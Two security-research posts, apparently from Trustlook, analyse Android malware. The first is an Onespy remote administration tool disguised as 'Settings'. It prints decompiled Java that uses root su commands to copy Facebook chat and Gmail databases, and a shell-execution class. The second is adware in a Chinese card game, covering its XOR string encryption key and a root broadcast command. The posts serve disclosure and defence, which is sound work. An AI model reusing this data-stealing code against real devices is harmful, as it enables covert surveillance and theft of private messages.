Trustlook Discovers a Remote Administration Tool (RAT) Android Malware

High Risk Malware by Onespy collects data from popular apps

The malicious app was detected by Trustlook as “Android.Trojan.Pathcall”, with a severity rating of  8/10 (High Risk). It disguises itself as a “System Settings” app to avoid being removed. The app starts as a service and is invisible to the user.

The package can be identified as having the following characteristics:

  • MD5: 28de4b4d2e964ad25403e9c2133b2939
  • SHA256: 6f86bb869c865910c44a2b033c547a7a8b220ae3c48cd5948e74b32df286dbbc
  • Size: 184036 bytes
  • App name: Settings
  • Package name: com.path.call

The package icon is:

image00

Upon execution, the app persuades the user to grant device administrator access in order to maintain the persistence on the system:

 

image02


The app runs itself as a service in the background:

 

image01


From the screenshot below, the second “Settings” is cleverly disguised as the Remote Administration Tool (RAT) app:

 

image04


The app is developed by “www.onespy.in” and signed with the following certificate:

 

image03


Apparently the app is signed by the Android Debug Certificate. The website claims the app is “undeletable” even after a factory data reset. However, it can be removed if the user knows how to terminate the service.

The website provides a remote access panel. Depending on the packages one chooses, the registered user can perform different functions and retrieve data from many popular apps. Data such as:

  • Call Logs
  • Call Recordings
  • Applications
  • Contacts
  • SMS Messages
  • Photos
  • Surroundings
  • GPS Locations
  • Facebook Chat
  • Hike Chat
  • IMO Chat
  • Line Chat
  • Skype Call Logs
  • Skype Chat
  • Viber Call Logs
  • Viber Chat
  • WhatsApp Call Logs
  • WhatsApp Chat
  • Gmail Emails
  • Outlook Emails
  • Yahoo Emails
  • Photo Capture
  • Screenshots


In addition to the above data, the app contains code to retrieve data from Twitter, Facebook, and Gmail. For example, the following code snippets are used to retrieve Facebook chat data:

public class FBDBSender

{

 private static boolean copyDB(String paramString1, String paramString2)

 {

   try

   {

     L.l(“fb copy:” + paramString1 + “;” + paramString2);

     paramString1 = “cp ” + paramString1 + ” ” + paramString2;

     int i = Runtime.getRuntime().exec(new String[] { “su”, “-c”, paramString1 }).waitFor();

     return i == 0;

   }

   catch (Exception paramString1)

   {

     L.l(paramString1);

   }

   return false;

 }

 

 private static String getName(String paramString)

 {

   try

   {

     paramString = new JSONObject(paramString).getString(“name”);

     return paramString;

   }

   catch (Exception paramString) {}

   return “”;

 }

[…]

 private static void sendThreadsTable(Context paramContext)

 {

   if (Environment.getExternalStorageState().equals(“mounted”)) {

     localObject = Environment.getExternalStorageDirectory().getAbsolutePath();

   }

   for (;;)

   {

     str = localObject + “/fbdb2.db”;

     if (Environment.getExternalStorageState().equals(“mounted”))

     {

       localObject = Environment.getExternalStorageDirectory().getAbsolutePath();

       localObject = localObject + “/fb_chat.csv”;

     }

     for (;;)

     {

       try

       {

         if (copyDB(“/data/data/com.facebook.katana/databases/threads_db2”, str))

         {

           L.l(“fbdb copied”);

           localSQLiteDatabase = SQLiteDatabase.openDatabase(str, null, 1);

           localCursor = localSQLiteDatabase.rawQuery(“SELECT sender, text, timestamp_ms FROM messages”, null);

    […]


The following code snippets are used to get Gmail data:

public class GMailAppDBReader

{

 private static final String dbnamePrefix = “gmldbcp_”;

 

 private static String[] copyDB(Context paramContext)

 {

   Object localObject3;

   int i;

   int j;

   OutputStream localOutputStream;

   try

   {

     localObject1 = Runtime.getRuntime().exec(new String[] { “su”, “-c”, “find / -name mailstore*@gmail.com.db” }).getInputStream();

     Object localObject2 = new byte[660];

     localObject3 = new StringBuffer();

     for (;;)

     {

       i = ((InputStream)localObject1).read((byte[])localObject2);

       if (i == -1)

       {

         localObject2 = ((StringBuffer)localObject3).toString().split(“n”);

         localObject3 = new String[localObject2.length];

         j = 0;

         Process localProcess = Runtime.getRuntime().exec(“su”);

         localOutputStream = localProcess.getOutputStream();

         int k = localObject2.length;

         i = 0;

         if (i < k) {

           break;

         }

        […]

   String str = ((String)localObject1).substring(((String)localObject1).lastIndexOf(‘/’) + 1, ((String)localObject1).lastIndexOf(‘@’));

   StringBuilder localStringBuilder = new StringBuilder(“cp “).append((String)localObject1).append(” “);

   if (Environment.getExternalStorageState().equals(“mounted”)) {}

   for (Object localObject1 = Environment.getExternalStorageDirectory().getAbsolutePath();; localObject1 = paramContext.getFilesDir().getAbsolutePath())

   {

     localOutputStream.write(((String)localObject1 + “/” + “gmldbcp_” + str + “.dbn”).getBytes());

     localObject3[j] = str;

     j += 1;

     i += 1;

     break;

   }

 }

      […]


One special feature that the app provides is the ability to run a remote command shell, which gives the controller access to the linux system in an android device:

public class ExecShell {

   public enum SHELL_CMD {

       public static final enum SHELL_CMD check_su_binary;

 

       static {

           SHELL_CMD.check_su_binary = new SHELL_CMD(“check_su_binary”, 0, new String[]{“/system/xbin/which”,

                   “su”});

           SHELL_CMD.ENUM$VALUES = new SHELL_CMD[]{SHELL_CMD.check_su_binary};

       }

 

       private SHELL_CMD(String arg1, int arg2, String[] command) {

           super(arg1, arg2);

           this.command = command;

       }

 

       public static SHELL_CMD valueOf(String arg1) {

           return Enum.valueOf(SHELL_CMD.class, arg1);

       }

 

       public static SHELL_CMD[] values() {

           SHELL_CMD[] v0 = SHELL_CMD.ENUM$VALUES;

           int v1 = v0.length;

           SHELL_CMD[] v2 = new SHELL_CMD[v1];

           System.arraycopy(v0, 0, v2, 0, v1);

           return v2;

       }

   }


Summary
The Remote Administration Tool by Onespy is very dangerous malware targeting Android devices. It exhibits backdoor functionality as well as the ability to collect data. The app can be used as a monitoring tool, as well as misused as a powerful remote control tool by criminals and malicious hackers.

A Collection of Ads Behind Your Favorite Game App With More Than 6 Million Downloads

– By Trustlook Research Team

A popular Chinese game with more than 6 million downloads secretly promotes other apps using a well-protected and widely used advertisement library.

Package name: com.xyz.ddz

Chinese App name: 欢乐逗地主

Download count: 6,000,000+

Icon:icon

Trustlook has discovered a serious adware intrusion within one of the most popular game apps in China. Immediately after installation, the app behaves normally, in which a user can play the game without restrictions or advertisements.After approximately 4 hours , various types of pop up large screen advertisements (i.e. adware) are displayed, even when the app is not in use.

The app is able to display this adware by importing two ad libraries. These libraries are implemented using native methods, including communicating with the Host App when prompted by the ad. These two ad libraries are widely used, but many anti-virus vendors are not able to detect them. All of the strings in these ad libraries are encrypted, and together these ad libraries adopt at least 8 methods to display ads, including:

  • To display the ad in the middle of the launcher
  • To display the installation notification (which can not be closed) in the middle of the launcher
  • To display the ad in the middle of the browser
  • To display the ad banner at the top of the browser
  • To display the ad banner at the bottom of the browser
  • To display the ad banner at the top of the input method
  • To display a floating ad banner with the Angry Bird icon
  • To dreate a promoted app icon in the launcher

One of the most popular implementations of this adware is an ad in the middle of the launcher. If you click the ad, then one of the following three APKs will be downloaded:

  • Qihoo mobile assistant APK (when you click the first Ad screen)
  • Qihoo browser APK (when you click the second Ad screen)
  • Jiuyou APK (when you click the third Ad screen)

ad1

 

ad2

 

After you have downloaded the APK file, a pop up window will notify you to install the downloaded APK file. If you click the Cancel button, every 30 minutes or when you attempt to unlock your phone, the same pop up window will be displayed asking if you would like to install the APK. And this pop up doesn’t have a “close” button or feature. It’s a never ending loop that creates a trap for the user.

qihoo_notify12

 

If you click the “Enter” button(which the app forces because there is no other option to bypass the action), it will pop up this window:

qihoo_notify2

 

When you open a browser, such as Google Chrome, the ads will be displayed at the top, bottom, or middle of the page. A message also shows up in the notification bar of your device.

browser1

browser2

browser3

browser4

 

And the ad displayed in the notification bar.

notify

Ad displayed in the browser:

browser5

 

browser6

 

If you click the banner ad that is displayed on the bottom of a browser window, the following window containing three app icons will appear.

8

 

In addition to the pop up ad displaying the three app icons, a floating banner icon, which is the same in appearance as the Angry bird icon below, will appear on your home screen.

9

 

If you click the Angry Birds icon, it will pop up a window with a list of apps, like this:

10

 

11

 

After the app has been installed for 5 hours, it will create a shortcut to the Qihoo mobile assistant on the launcher screen, no matter if you close the ad or not. Sometimes the ad will pop up suddenly and erratically. 

15

 

16

 

Unfortunately, this shortcut is not a real shortcut that points to the Qihoo mobile assistant app. Instead it points to the Qihoo mobile assistant APK file, which located in the sdcard in the path:

/sdcard/Download/oO_zziS7cMk=/uLRFttrgta+JdOk+ycQ

/0Mdf4fxaQpU1MNb+F6O3YquZI+c= The game didn’t install the Qihoo 360 app, but if you click this icon, it will begin to install the Qihoo mobile assistant app.

17

 

After further analysis of this app, we discovered that the advertisement function is implemented in this module: com.xyz.ddz.gauxsw.

pkg

Most strings are encrypted in the function of com.xyz.ddz.gauxsw.d.a.a.a():

19

 

The encryption routine first decodes the string (the first parameter of this function) in base64 format, then xor it with every byte in the second parameter (“7b120431-5374-40d1-84d6-624980271ac8”):

20 21

 

22

Trustlook created a tool to decrypt it, which revealed the following strings:

decrypt_

 

24

 

From the analysis we know that the ad is displayed by the com.yt.uulib and  youtou.ad.api SDK, which are two popular adware libraries.

These two ad libraries are able to display ads in two ways:

  • Floating banner
  • Fixed banner

We found that the app used the self-protect function to protect itself and to evade anti-virus vendors. It runs 3 processes (it runs one first, which then forks into two more). When you close any of them, it will restart and run the 3 processes again:

proc1

We also found that this app uses the native library to notify the main app to activate the the native library file. It is named daemon_exe, is a .so file, and placed in:

/data/data/com.xyz.ddz/files/jklm/VTcJhWmfUI6zvrYHQ0kO63_GpIHWtI2t/IL2msjinFbNh3jOA/RwR-jYJzNcY=/vR48I2IAv5GNfwRrMoe0zA==/daemon_exe

The main app will check if the user’s phone is rooted. If it is, the main app will load the daemon_exe into system as the root user:

proc2

After the analysis of this native library file, we found that its main function is to communicate with the main app by local tcp connection (127.0.0.1:5037(0x13AD)) and then send the broadcast to it for waking up and displaying the ad.

proc4

system

 

After the execution, the native library will execute this command as the root user:

/system/bin/am broadcast -a com.uu.action.wakeup –es start_bc_send_id $ro.build.version.sdk(var)$ –include-stopped-packages –user 0

This command will send a broadcast, whose action is com.uu.action.wakeup and it will take the key-value string pair start_bc_send_id”:$ro.build.version.sdk(var)$ and the phone’s sdk num and the –include-stopped-packages as the parameter.

From the manifest, we know that this broadcast could be received by com.xyz.ddz.gauxsw.a.e.a:

manifest

At the time of this release, the Trustlook Mobile Security app and Blue Frog Mobile Security app teams have detected the malicious behaviors of the sample being studied.